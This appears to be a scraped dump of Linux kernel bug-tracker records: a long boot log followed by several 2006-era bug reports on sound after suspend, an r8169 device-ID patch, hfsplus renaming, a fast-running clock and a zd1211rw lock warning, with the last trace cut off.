19.252670] Console: colour VGA+ 80x25 [ 19.699175] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) [ 19.720682] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) [ 19.775239] Memory: 514192k/524224k available (3115k kernel code, 9480k reserved, 1332k data, 200k init, 0k highmem) [ 19.806833] virtual kernel memory layout: [ 19.806835] fixmap : 0xfffb7000 - 0xfffff000 ( 288 kB) [ 19.806838] vmalloc : 0xe0800000 - 0xfffb5000 ( 503 MB) [ 19.806841] lowmem : 0xc0000000 - 0xdfff0000 ( 511 MB) [ 19.806844] .init : 0xc055a000 - 0xc058c000 ( 200 kB) [ 19.806847] .data : 0xc040add2 - 0xc055801c (1332 kB) [ 19.806850] .text : 0xc0100000 - 0xc040add2 (3115 kB) [ 19.922390] Checking if this processor honours the WP bit even in supervisor mode... Ok. [ 20.090938] Calibrating delay using timer specific routine.. 2006.03 BogoMIPS (lpj=10030169) [ 20.116398] Security Framework v1.0.0 initialized [ 20.130559] Mount-cache hash table entries: 512 [ 20.144376] CPU: After generic identify, caps: 0183fbff c1c7fbff 00000000 00000000 00000000 00000000 00000000 [ 20.144391] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 20.165812] CPU: L2 Cache: 256K (64 bytes/line) [ 20.179422] CPU: After all inits, caps: 0183fbff c1c7fbff 00000000 00000420 00000000 00000000 00000000 [ 20.179434] Intel machine check architecture supported. [ 20.195142] Intel machine check reporting enabled on CPU#0. [ 20.211889] CPU: AMD Athlon(tm) Processor stepping 02 [ 20.227217] Checking 'hlt' instruction... OK. [ 20.272277] ACPI: Core revision 20060707 [ 20.293071] ACPI: setting ELCR to 0800 (from 0e20) [ 20.571309] NET: Registered protocol family 16 [ 20.584668] spurious 8259A interrupt: IRQ7. [ 20.584842] ACPI: bus type pci registered [ 20.613412] PCI: PCI BIOS revision 2.10 entry at 0xfb380, last bus=1 [ 20.632496] PCI: Using configuration type 1 [ 20.645070] Setting up standard PCI resources [ 20.678366] ACPI: Interpreter enabled [ 20.689397] ACPI: Using PIC for interrupt routing [ 20.704509] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 20.718933] PCI: Probing PCI hardware (bus 00) [ 20.719067] ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 [ 20.738008] Disabling VIA memory write queue (PCI ID 0305, rev 03): [55] 81 &amp; 1f -&gt; 01 [ 20.762094] PCI quirk: region 4000-40ff claimed by vt82c586 ACPI [ 20.780142] PCI quirk: region 6000-607f claimed by vt82c686 HW-mon [ 20.798706] PCI quirk: region 5000-500f claimed by vt82c686 SMB [ 20.816897] Boot video device is 0000:01:00.0 [ 20.816960] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 20.845634] ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) [ 20.868819] ACPI: PCI Interrupt Link [LNKB] (IRQs 1 3 4 5 6 7 *10 11 12 14 15) [ 20.892033] ACPI: PCI Interrupt Link [LNKC] (IRQs 1 3 4 *5 6 7 10 11 12 14 15) [ 20.915251] ACPI: PCI Interrupt Link [LNKD] (IRQs 1 3 4 5 6 7 10 11 12 14 15) *9 [ 20.942867] Linux Plug and Play Support v0.97 (c) Adam Belay [ 20.959882] pnp: PnP ACPI init [ 20.969184] pnp: ACPI device : hid PNP0C01 [ 20.969687] pnp: ACPI device : hid PNP0A03 [ 20.970174] pnp: ACPI device : hid PNP0C02 [ 20.970252] pnp: ACPI device : hid PNP0200 [ 20.970324] pnp: ACPI device : hid PNP0B00 [ 20.970408] pnp: ACPI device : hid PNP0800 [ 20.970478] pnp: ACPI device : hid PNP0C04 [ 20.970841] pnp: ACPI device : hid PNP0700 [ 20.971278] pnp: ACPI device : hid PNP0501 [ 20.972067] pnp: ACPI device : hid PNP0501 [ 20.973083] pnp: ACPI device : hid PNP0400 [ 20.973937] pnp: ACPI device : hid PNP0F13 [ 20.974075] pnp: ACPI device : hid PNP0303 [ 20.974157] pnp: PnP ACPI: found 13 devices [ 20.986836] Generic PHY: Registered new driver [ 21.000445] SCSI subsystem initialized [ 21.011831] usbcore: registered new interface driver usbfs [ 21.028370] usbcore: registered new interface driver hub [ 21.044386] usbcore: registered new device driver usb [ 21.059684] PCI: Using ACPI for IRQ routing [ 21.072256] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report [ 21.127722] pnp: the driver 'system' has been registered [ 21.127772] pnp: match found with the PnP device '00:00' and the driver 'system' [ 21.127788] pnp: match found with the PnP device '00:02' and the driver 'system' [ 21.128195] PCI: Bridge: 0000:00:01.0 [ 21.139224] IO window: disabled. [ 21.149463] MEM window: dc000000-ddffffff [ 21.162033] PREFETCH window: d0000000-d7ffffff [ 21.175923] PCI: Setting latency timer of device 0000:00:01.0 to 64 [ 21.175969] NET: Registered protocol family 2 [ 21.280278] IP route cache hash table entries: 4096 (order: 2, 16384 bytes) [ 21.301350] TCP established hash table entries: 16384 (order: 4, 65536 bytes) [ 21.323070] TCP bind hash table entries: 8192 (order: 3, 32768 bytes) [ 21.342556] TCP: Hash tables configured (established 16384 bind 8192) [ 21.361882] TCP reno registered [ 21.374030] Total HugeTLB memory allocated, 0 [ 21.387259] VFS: Disk quotas dquot_6.5.1 [ 21.399102] Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) [ 21.418872] SGI XFS with ACLs, security attributes, no debug enabled [ 21.438164] SGI XFS Quota Management subsystem [ 21.451599] io scheduler noop registered [ 21.463489] io scheduler cfq registered (default) [ 21.477809] PCI: Disabling Via external APIC routing [ 21.492747] pci 0000:00:07.2: uhci_check_and_reset_hc: legsup = 0x2000 [ 21.492752] pci 0000:00:07.2: Performing full reset [ 21.492769] pci 0000:00:07.3: uhci_check_and_reset_hc: legsup = 0x2000 [ 21.492773] pci 0000:00:07.3: Performing full reset [ 21.493122] ACPI: CPU0 (power states: C1[C1] C2[C2]) [ 21.508288] ACPI: Processor [CPU0] (supports 2 throttling states) [ 21.566883] Real Time Clock Driver v1.12ac [ 21.579423] Non-volatile memory driver v1.2 [ 21.592069] Linux agpgart interface v0.101 (c) Dave Jones [ 21.608415] agpgart: Detected VIA Twister-K/KT133x/KM133 chipset [ 21.633376] agpgart: AGP aperture is 64M @ 0xd8000000 [ 21.648722] [drm] Initialized drm 1.0.1 20051102 [ 21.662676] Serial: 8250/16550 driver $Revision: 1.90 $ 1 ports, IRQ sharing disabled [ 21.686423] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A [ 21.704956] pnp: the driver 'serial' has been registered [ 21.705101] pnp: match found with the PnP device '00:08' and the driver 'serial' [ 21.705404] 00:08: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A [ 21.722476] pnp: match found with the PnP device '00:09' and the driver 'serial' [ 21.722818] pnp: Device 00:09 disabled. [ 21.734582] parport_pc: VIA 686A/8231 detected [ 21.734587] parport_pc: probing current configuration [ 21.734606] parport_pc: Current parallel port base: 0x378 [ 21.734652] parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE,EPP] [ 1.420000] parport_pc: VIA parallel port: io=0x378, irq=7 [ 1.430000] Floppy drive(s): fd0 is 1.44M [ 1.460000] FDC 0 is a post-1991 82077 [ 1.470000] fealnx.c:v2.52 Sep-11-2006 [ 1.480000] ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 [ 1.490000] PCI: setting IRQ 11 as level-triggered [ 1.490000] ACPI: PCI Interrupt 0000:00:08.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 [ 1.520000] eth0: 100/10M Ethernet PCI Adapter at 0001ec00, 00:02:2a:c0:86:2a, IRQ 11. [ 1.540000] Linux video capture interface: v2.00 [ 1.550000] libata version 2.00 loaded. [ 1.550000] pata_via 0000:00:07.1: version 0.1.14 [ 1.550000] PCI: VIA IRQ fixup for 0000:00:07.1, from 255 to 0 [ 1.560000] ata1: PATA max UDMA/66 cmd 0x1F0 ctl 0x3F6 bmdma 0xD000 irq 14 [ 1.570000] ata2: PATA max UDMA/66 cmd 0x170 ctl 0x376 bmdma 0xD008 irq 15 [ 1.580000] scsi0 : pata_via [ 1.750000] ata1.00: ATA-6, max UDMA/100, 39865392 sectors: LBA [ 1.760000] ata1.00: ata1: dev 0 multi count 16 [ 1.770000] ata1.01: ATA-7, max UDMA/133, 490234752 sectors: LBA48 [ 1.780000] ata1.01: ata1: dev 1 multi count 16 [ 1.800000] ata1.00: configured for UDMA/33 [ 1.810000] ata1.01: configured for UDMA/33 [ 1.820000] scsi1 : pata_via [ 2.150000] ata2.00: ATAPI, max MWDMA2 [ 2.320000] ata2.01: ATAPI, max MWDMA2 [ 2.490000] ata2.00: configured for MWDMA2 [ 2.660000] ata2.01: configured for MWDMA2 [ 2.670000] scsi 0:0:0:0: Direct-Access ATA SAMSUNG SV2042H PK10 PQ: 0 ANSI: 5 [ 2.680000] SCSI device sda: 39865392 512-byte hdwr sectors (20411 MB) [ 2.690000] sda: Write Protect is off [ 2.700000] sda: Mode Sense: 00 3a 00 00 [ 2.700000] SCSI device sda: drive cache: write back [ 2.710000] SCSI device sda: 39865392 512-byte hdwr sectors (20411 MB) [ 2.720000] sda: Write Protect is off [ 2.730000] sda: Mode Sense: 00 3a 00 00 [ 2.730000] SCSI device sda: drive cache: write back [ 2.740000] sda: sda1 sda2 &lt; sda5 &gt; [ 2.770000] sd 0:0:0:0: Attached scsi disk sda [ 2.790000] scsi 0:0:1:0: Direct-Access ATA Maxtor 6L250R0 BAH4 PQ: 0 ANSI: 5 [ 2.800000] SCSI device sdb: 490234752 512-byte hdwr sectors (251000 MB) [ 2.810000] sdb: Write Protect is off [ 2.820000] sdb: Mode Sense: 00 3a 00 00 [ 2.820000] SCSI device sdb: drive cache: write back [ 2.830000] SCSI device sdb: 490234752 512-byte hdwr sectors (251000 MB) [ 2.840000] sdb: Write Protect is off [ 2.850000] sdb: Mode Sense: 00 3a 00 00 [ 2.850000] SCSI device sdb: drive cache: write back [ 2.860000] sdb: sdb1 sdb2 sdb3 sdb4 &lt; sdb5 sdb6 &gt; [ 2.930000] sd 0:0:1:0: Attached scsi disk sdb [ 2.940000] scsi 1:0:0:0: CD-ROM SAMSUNG DVD-ROM SD-612S SS06 PQ: 0 ANSI: 5 [ 2.950000] scsi 1:0:1:0: CD-ROM SAMSUNG CD-R/RW SW-208B BS04 PQ: 0 ANSI: 5 [ 2.960000] ieee1394: Initialized config rom entry `ip1394' [ 2.960000] ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) [ 2.970000] ieee1394: sbp2: Try serialize_io=0 for better performance [ 2.980000] ehci_hcd: block sizes: qh 128 qtd 96 itd 192 sitd 96 [ 2.980000] ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) [ 2.980000] ohci_hcd: block sizes: ed 64 td 64 [ 2.980000] USB Universal Host Controller Interface driver v3.0 [ 2.990000] ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 10 [ 3.000000] PCI: setting IRQ 10 as level-triggered [ 3.000000] ACPI: PCI Interrupt 0000:00:07.2[D] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 3.020000] PCI: VIA IRQ fixup for 0000:00:07.2, from 9 to 10 [ 3.030000] uhci_hcd 0000:00:07.2: UHCI Host Controller [ 3.040000] drivers/usb/core/inode.c: creating file 'devices' [ 3.040000] drivers/usb/core/inode.c: creating file '001' [ 3.040000] uhci_hcd 0000:00:07.2: new USB bus registered, assigned bus number 1 [ 3.050000] uhci_hcd 0000:00:07.2: detected 2 ports [ 3.060000] uhci_hcd 0000:00:07.2: uhci_check_and_reset_hc: cmd = 0x0000 [ 3.060000] uhci_hcd 0000:00:07.2: Performing full reset [ 3.060000] uhci_hcd 0000:00:07.2: irq 10, io base 0x0000d400 [ 3.070000] usb usb1: default language 0x0409 [ 3.070000] usb usb1: new device strings: Mfr=3, Product=2, SerialNumber=1 [ 3.070000] usb usb1: Product: UHCI Host Controller [ 3.080000] usb usb1: Manufacturer: Linux 2.6.18-git11 uhci_hcd [ 3.090000] usb usb1: SerialNumber: 0000:00:07.2 [ 3.100000] usb usb1: uevent [ 3.100000] usb usb1: usb_probe_device [ 3.100000] usb usb1: configuration #1 chosen from 1 choice [ 3.110000] usb usb1: adding 1-0:1.0 (config #1, interface 0) [ 3.110000] usb 1-0:1.0: uevent [ 3.110000] hub 1-0:1.0: usb_probe_interface [ 3.110000] hub 1-0:1.0: usb_probe_interface - got id [ 3.110000] hub 1-0:1.0: USB hub found [ 3.120000] hub 1-0:1.0: 2 ports detected [ 3.130000] hub 1-0:1.0: standalone hub [ 3.130000] hub 1-0:1.0: no power switching (usb 1.0) [ 3.130000] hub 1-0:1.0: individual port over-current protection [ 3.130000] hub 1-0:1.0: power on to power good time: 2ms [ 3.130000] hub 1-0:1.0: local power source is good [ 3.130000] hub 1-0:1.0: trying to enable port power on non-switchable hub [ 3.240000] hub 1-0:1.0: state 7 ports 2 chg 0000 evt 0000 [ 3.240000] drivers/usb/core/inode.c: creating file '001' [ 3.240000] ACPI: PCI Interrupt 0000:00:07.3[D] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 3.260000] PCI: VIA IRQ fixup for 0000:00:07.3, from 9 to 10 [ 3.270000] uhci_hcd 0000:00:07.3: UHCI Host Controller [ 3.280000] uhci_hcd 0000:00:07.2: port 1 portsc 018a,00 [ 3.280000] hub 1-0:1.0: port 1, status 0300, change 0003, 1.5 Mb/s [ 3.280000] drivers/usb/core/inode.c: creating file '002' [ 3.280000] uhci_hcd 0000:00:07.3: new USB bus registered, assigned bus number 2 [ 3.290000] uhci_hcd 0000:00:07.3: detected 2 ports [ 3.300000] uhci_hcd 0000:00:07.3: uhci_check_and_reset_hc: cmd = 0x0000 [ 3.300000] uhci_hcd 0000:00:07.3: Performing full reset [ 3.300000] uhci_hcd 0000:00:07.3: irq 10, io base 0x0000d800 [ 3.310000] usb usb2: default language 0x0409 [ 3.310000] usb usb2: new device strings: Mfr=3, Product=2, SerialNumber=1 [ 3.310000] usb usb2: Product: UHCI Host Controller [ 3.320000] usb usb2: Manufacturer: Linux 2.6.18-git11 uhci_hcd [ 3.330000] usb usb2: SerialNumber: 0000:00:07.3 [ 3.340000] usb usb2: uevent [ 3.340000] usb usb2: usb_probe_device [ 3.340000] usb usb2: configuration #1 chosen from 1 choice [ 3.350000] usb usb2: adding 2-0:1.0 (config #1, interface 0) [ 3.350000] usb 2-0:1.0: uevent [ 3.350000] hub 2-0:1.0: usb_probe_interface [ 3.350000] hub 2-0:1.0: usb_probe_interface - got id [ 3.350000] hub 2-0:1.0: USB hub found [ 3.360000] hub 2-0:1.0: 2 ports detected [ 3.370000] hub 2-0:1.0: standalone hub [ 3.370000] hub 2-0:1.0: no power switching (usb 1.0) [ 3.370000] hub 2-0:1.0: individual port over-current protection [ 3.370000] hub 2-0:1.0: power on to power good time: 2ms [ 3.370000] hub 2-0:1.0: local power source is good [ 3.370000] hub 2-0:1.0: trying to enable port power on non-switchable hub [ 3.460000] hub 1-0:1.0: debounce: port 1: total 100ms stable 100ms status 0x300 [ 3.460000] uhci_hcd 0000:00:07.2: port 2 portsc 018a,00 [ 3.460000] hub 1-0:1.0: port 2, status 0300, change 0003, 1.5 Mb/s [ 3.480000] drivers/usb/core/inode.c: creating file '001' [ 3.620000] hub 1-0:1.0: debounce: port 2: total 100ms stable 100ms status 0x300 [ 3.620000] hub 1-0:1.0: state 7 ports 2 chg 0000 evt 0000 [ 3.620000] hub 2-0:1.0: state 7 ports 2 chg 0000 evt 0006 [ 3.620000] uhci_hcd 0000:00:07.3: port 1 portsc 018a,00 [ 3.620000] hub 2-0:1.0: port 1, status 0300, change 0003, 1.5 Mb/s [ 3.780000] hub 2-0:1.0: debounce: port 1: total 100ms stable 100ms status 0x300 [ 3.780000] uhci_hcd 0000:00:07.3: port 2 portsc 018a,00 [ 3.780000] hub 2-0:1.0: port 2, status 0300, change 0003, 1.5 Mb/s [ 3.940000] hub 2-0:1.0: debounce: port 2: total 100ms stable 100ms status 0x300 [ 3.940000] hub 2-0:1.0: state 7 ports 2 chg 0000 evt 0000 [ 3.940000] usbcore: registered new interface driver libusual [ 3.950000] pnp: the driver 'i8042 kbd' has been registered [ 3.950000] pnp: match found with the PnP device '00:0c' and the driver 'i8042 kbd' [ 3.950000] pnp: the driver 'i8042 aux' has been registered [ 3.950000] pnp: match found with the PnP device '00:0b' and the driver 'i8042 aux' [ 3.950000] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 [ 3.960000] serio: i8042 AUX port at 0x60,0x64 irq 12 [ 3.970000] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 3.980000] mice: PS/2 mouse device common for all mice [ 3.990000] input: PC Speaker as /class/input/input0 [ 4.020000] input: AT Translated Set 2 keyboard as /class/input/input1 [ 4.030000] i2c /dev entries driver [ 4.180000] input: GenPS/2 Genius Mouse as /class/input/input2 [ 4.240000] Advanced Linux Sound Architecture Driver Version 1.0.12rc1 (Thu Jun 22 13:55:50 2006 UTC). [ 4.250000] ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 [ 4.260000] ACPI: PCI Interrupt 0000:00:09.1[A] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 4.280000] ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 5 [ 4.290000] PCI: setting IRQ 5 as level-triggered [ 4.290000] ACPI: PCI Interrupt 0000:00:07.5[C] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 [ 4.310000] PCI: Setting latency timer of device 0000:00:07.5 to 64 [ 4.490000] usb usb1: suspend_rh (auto-stop) [ 4.830000] ALSA device list: [ 4.830000] #0: VIA 82C686A/B rev20 with STAC9721,23 at 0xdc00, irq 5 [ 4.840000] #1: Brooktree Bt878 at 0xdf002000, irq 10 [ 4.850000] NET: Registered protocol family 1 [ 4.860000] NET: Registered protocol family 10 [ 4.870000] lo: Disabled Privacy Extensions [ 4.880000] IPv6 over IPv4 tunneling driver [ 4.890000] Testing NMI watchdog ... &lt;7&gt;usb usb2: suspend_rh (auto-stop) [ 5.010000] OK. [ 5.020000] Using IPI Shortcut mode [ 5.030000] ACPI: (supports&lt;6&gt;Time: tsc clocksource has been installed. [ 5.050000] S0 S1 S4&lt;6&gt;Time: acpi_pm clocksource has been installed. [ 5.070000] S5) [ 5.130000] XFS mounting filesystem sdb2 [ 5.240000] Ending clean XFS mount for filesystem: sdb2 [ 5.240000] VFS: Mounted root (xfs filesystem) readonly. [ 5.250000] Freeing unused kernel memory: 200k freed [ 6.730000] warning: process `touch' used the removed sysctl system call [ 7.220000] usb 2-0:1.0: uevent [ 7.220000] usb usb2: uevent [ 7.220000] usb 1-0:1.0: uevent [ 7.220000] usb usb1: uevent [ 10.500000] sr0: scsi3-mmc drive: 16x/40x cd/rw xa/form2 cdda tray [ 10.500000] Uniform CD-ROM driver Revision: 3.20 [ 10.510000] sr 1:0:0:0: Attached scsi CD-ROM sr0 [ 10.510000] sr1: scsi3-mmc drive: 8x/32x writer cd/rw xa/form2 cdda tray [ 10.510000] sr 1:0:1:0: Attached scsi CD-ROM sr1 [ 10.570000] ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 [ 10.570000] nvidiafb: Device ID: 10de0110 [ 10.840000] nvidiafb: EDID found from BUS1 [ 10.860000] nvidiafb: Unable to detect which CRTCNumber... [ 10.860000] ...Defaulting to CRTCNumber 0 [ 10.860000] nvidiafb: Using CRT on CRTC 0 [ 10.860000] nvidiafb: MTRR set to ON [ 10.860000] nvidiafb: PCI nVidia NV11 framebuffer (32MB @ 0xD0000000) [ 14.140000] bttv: driver version 0.9.16 loaded [ 14.140000] bttv: using 8 buffers with 2080k (520 pages) each for capture [ 14.140000] bttv: Bt8xx card found (0). [ 14.140000] ACPI: PCI Interrupt 0000:00:09.0[A] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 14.140000] bttv0: Bt878 (rev 17) at 0000:00:09.0, irq: 10, latency: 32, mmio: 0xdf001000 [ 14.140000] bttv0: detected: Hauppauge WinTV [card=10], PCI subsystem ID is 0070:13eb [ 14.140000] bttv0: using: Hauppauge (bt878) [card=10,autodetected] [ 14.140000] bttv0: gpio: en=00000000, out=00000000 in=00ffffdb [init] [ 14.150000] bttv0: Hauppauge/Voodoo msp34xx: reset line init [5] [ 14.250000] tveeprom 4-0050: Hauppauge model 61344, rev D421, serial# 3902813 [ 14.250000] tveeprom 4-0050: tuner model is Philips FM1216 (idx 21, type 5) [ 14.250000] tveeprom 4-0050: TV standards PAL(B/G) (eeprom 0x04) [ 14.250000] tveeprom 4-0050: audio processor is MSP3415 (idx 6) [ 14.250000] tveeprom 4-0050: has radio [ 14.250000] bttv0: Hauppauge eeprom indicates model#61344 [ 14.250000] bttv0: using tuner=5 [ 14.250000]</t>
  </si>
  <si>
    <t>Headphone jack not detected after resuming from suspend-to-RAM</t>
  </si>
  <si>
    <t>2.6.28</t>
  </si>
  <si>
    <t>2006-09-29 20:35 UTC</t>
  </si>
  <si>
    <t>Jae-hyeon Park</t>
  </si>
  <si>
    <t>2013-04-09 06:23 UTC</t>
  </si>
  <si>
    <t>Takashi Iwai</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Debian testing (etch) as of 2006-09-21 Hardware Environment: Thinkpad X41 Tablet Software Environment: gcc-3.4 $ lsmod | grep snd snd_intel8x0 30364 1 snd_intel8x0m 14924 0 snd_ac97_codec 95392 2 snd_intel8x0,snd_intel8x0m snd_ac97_bus 1920 1 snd_ac97_codec snd_pcm_oss 45472 0 snd_mixer_oss 16640 1 snd_pcm_oss snd_pcm 75656 4 snd_intel8x0,snd_intel8x0m,snd_ac97_codec,snd_pcm_oss snd_timer 21636 1 snd_pcm snd 46372 9 snd_intel8x0,snd_intel8x0m,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer soundcore 7904 1 snd snd_page_alloc 8008 3 snd_intel8x0,snd_intel8x0m,snd_pcm Problem Description: If a headphone jack is plugged in, the buildt-in speaker should be muted and sound should be played through the headphones. This is usually the case. After resuming from suspend-to-RAM, however, the built-in speaker plays sound and the headphones keep silent, as if the jack were unplugged. This problem does not happen after resuming from software suspend 2. Steps to reproduce: 1. Turn on the PC and boot the kernel. 2. Play some sound such as an mp3 music with no headphone jack plugged in. Sound plays through the speaker. 3. Plug in the jack. The speaker is muted and sound plays through the headphones. 4. Unplug the jack. 5. Suspend-to-RAM the PC. 6. Resume the PC. 7. Play the mp3 music. It plays through the speaker. 8. Plug in the jack. Music still plays through the speaker and the headphones don't work.</t>
  </si>
  <si>
    <t>r8169 driver - Corega support patch</t>
  </si>
  <si>
    <t>2.6.17-9</t>
  </si>
  <si>
    <t>2006-09-30 17:59 UTC</t>
  </si>
  <si>
    <t>Hidetoshi</t>
  </si>
  <si>
    <t>2006-10-21 14:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: Package: linux-2.6 Version: 2.6.17-9 Severity: important Kernel can't found driver for Corega Gigabit Network card. This card have RTL-8169 chip and r8169.ko make good. Cause of this trouble is r8169.c have not PCI Vender ID. Please include next PCI Vender ID to r8169.c . --- linux-source-2.6.17/drivers/net/r8169.c.orig 2006-06-18 10:49:35.000000000 +0900 +++ linux-source-2.6.17/drivers/net/r8169.c 2006-09-23 08:52:16.000000000 +0900 @@ -187,6 +187,7 @@ static struct pci_device_id rtl8169_pci_ { PCI_DEVICE(PCI_VENDOR_ID_DLINK, 0x4300), }, { PCI_DEVICE(0x16ec, 0x0116), }, { PCI_VENDOR_ID_LINKSYS, 0x1032, PCI_ANY_ID, 0x0024, }, + { PCI_DEVICE(0x1259, 0xc107), }, /* Corega LAPCIGT */ {0,}, }; http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=388870</t>
  </si>
  <si>
    <t>can't change filename case  on a non case sensitive hfsplus.</t>
  </si>
  <si>
    <t>2006-09-30 20:29 UTC</t>
  </si>
  <si>
    <t>didier</t>
  </si>
  <si>
    <t>2008-03-30 12:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: ubuntu Hardware Environment: ppc Mac Software Environment: Problem Description: You can't rename foo to Foo because hfsplus wrongly create 2 dentries for foo and Foo. Note: the steps below work when the fs is jfs (OS2 compatible mode). Steps to reproduce: from a shell command line. (this is more or less what nautilus does) $ &gt; foo $ stat foo $ stat Foo $ mv foo fooBAR $ stat Foo Here it should return an error.</t>
  </si>
  <si>
    <t>got a time machine, my time runs about 30times faster than it should</t>
  </si>
  <si>
    <t>2006-10-01 05:50 UTC</t>
  </si>
  <si>
    <t>2006-10-22 18:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: * 2.17.13 Hardware Environment: * WRAP-board, Geode Software Environment: * busybox-1.1.2 * uclibc-0.9.28 * kernel-setup: * &lt;*&gt; Enhanced Real Time Clock Support * Real Time Clock/&lt; &gt; RTC class Problem Description: RTC seems to be broken, using `date` to get my date looks like this: Geode ~ $ date Sun Oct 1 22:27:34 CEST 2006 *wait 1 second* Geode ~ $ date Sun Oct 1 22:28:03 CEST 2006 This also affects all time related functions like sleep, watch and so on.</t>
  </si>
  <si>
    <t>zd1211rw:  inconsistent lock state</t>
  </si>
  <si>
    <t>2.6.18-mm2</t>
  </si>
  <si>
    <t>2006-10-01 08:56 UTC</t>
  </si>
  <si>
    <t>2006-10-04 14:36 UTC</t>
  </si>
  <si>
    <t>Ulrich Kunitz</t>
  </si>
  <si>
    <t>Distribution: Mandriva 2007 RC2 Hardware Environment: i686-based desktop, USB Wifi adapter which appears to be a "Sagem XG76NA" (USB ID is 079b:0062, RF Type is AL2230). Problem Description: When I plug the adapter, the following lines appear in dmesg: usb 1-1: new full speed USB device using uhci_hcd and address 3 usb 1-1: new device found, idVendor=079b, idProduct=0062 usb 1-1: new device strings: Mfr=16, Product=32, SerialNumber=0 usb 1-1: Product: 802.11b/g USB WLAN usb 1-1: Manufacturer: ZyDAS usb 1-1: configuration #1 chosen from 1 choice ieee80211_crypt: registered algorithm 'NULL' ieee80211: 802.11 data/management/control stack, git-1.1.13 ieee80211: Copyright (C) 2004-2005 Intel Corporation &lt;jketreno@linux.intel.com&gt; ================================= [ INFO: inconsistent lock state ] 2.6.18-mm2 #163 --------------------------------- inconsistent {hardirq-on-W} -&gt; {in-hardirq-W} usage. swapper/0 [HC1[1]:SC0[0]:HE0:SE1] takes: (&amp;intr-&gt;lock){+-..}, at: [&lt;e1057675&gt;] int_urb_complete+0x6f/0xde [zd1211rw] {hardirq-on-W} state was registered at: [&lt;c012d16f&gt;] __lock_acquire+0x43b/0x9aa [&lt;c012d9a3&gt;] lock_acquire+0x60/0x80 [&lt;c029232e&gt;] _spin_lock+0x19/0x28 [&lt;e1056d28&gt;] zd_usb_ioread16v+0xc8/0x1d1 [zd1211rw] [&lt;e1056e4e&gt;] zd_usb_init_hw+0x1d/0x1f [zd1211rw] [&lt;e105647a&gt;] zd_chip_init_hw+0x67/0x5b4 [zd1211rw] [&lt;e1054fc8&gt;] zd_mac_init_hw+0x28/0x10a [zd1211rw] [&lt;e1057cd6&gt;] probe+0x3f6/0x49f [zd1211rw] [&lt;e0bf63b1&gt;] usb_probe_interface+0x92/0xc9 [usbcore] [&lt;c021e083&gt;] really_probe+0x3b/0xb9 [&lt;c021e181&gt;] driver_probe_device+0x80/0x8b [&lt;c021e283&gt;] __driver_attach+0x74/0xab [&lt;c021d7a7&gt;] bus_for_each_dev+0x3a/0x5f [&lt;c021dfa6&gt;] driver_attach+0x14/0x16 [&lt;c021da80&gt;] bus_add_driver+0x61/0x15b [&lt;c021e49a&gt;] driver_register+0x72/0x77 [&lt;e0bf5f6b&gt;] usb_register_driver+0x6f/0xd0 [usbcore] [&lt;e1061044&gt;] usb_init+0x44/0x65 [zd1211rw] [&lt;c01336c4&gt;] sys_init_module+0x1234/0x139d [&lt;c0102c41&gt;] sysenter_past_esp+0x56/0x8d [&lt;ffffffff&gt;] 0xffffffff irq event stamp: 20712220 hardirqs last enabled at (20712219): [&lt;c0101a9a&gt;] default_idle+0x41/0x72 hardirqs last disabled at (20712220): [&lt;c01036a3&gt;] common_interrupt+0x1b/0x2c softirqs last enabled at (20712204): [&lt;c011af9d&gt;] __do_softirq+0x97/0x9c softirqs last disabled at (20712137): [&lt;c011afcc&gt;] do_softirq+0x2a/0x42 other info that might help us debug this: no locks held by swapper/0. stack backtrace: [&lt;c0103939&gt;] show_trace_log_lvl+0x12/0x25 [&lt;c0103a1a&gt;] show_trace+0xd/0x10 [&lt;c010412c&gt;] dump_stack+0x19/0x1b [&lt;c012c063&gt;] print_usage_bug+0x1d1/0x1de [&lt;c012c3d0&gt;] mark_lock+0x8a/0x349 [&lt;c012d0f0&gt;] __lock_acquire+0x3bc/0x9aa [&lt;c012d9a3&gt;] lock_acquire+0x60/0x80 [&lt;c029232e&gt;] _spin_lock+0x19/0x28 [&lt;e1057675&gt;] int_urb_complete+0x6f/0xde [zd1211rw] [&lt;e0bf29e0&gt;] usb_hcd_giveback_urb+0x1a/0x48 [usbcore] [&lt;e0a8c71f&gt;] uhci_giveback_urb+0x11b/0x142 [uhci_hcd] [&lt;e0a8cd3e&gt;] uhci_scan_schedule+0x4fd/0x771 [uhci_hcd] [&lt;e0a8e7bf&gt;] 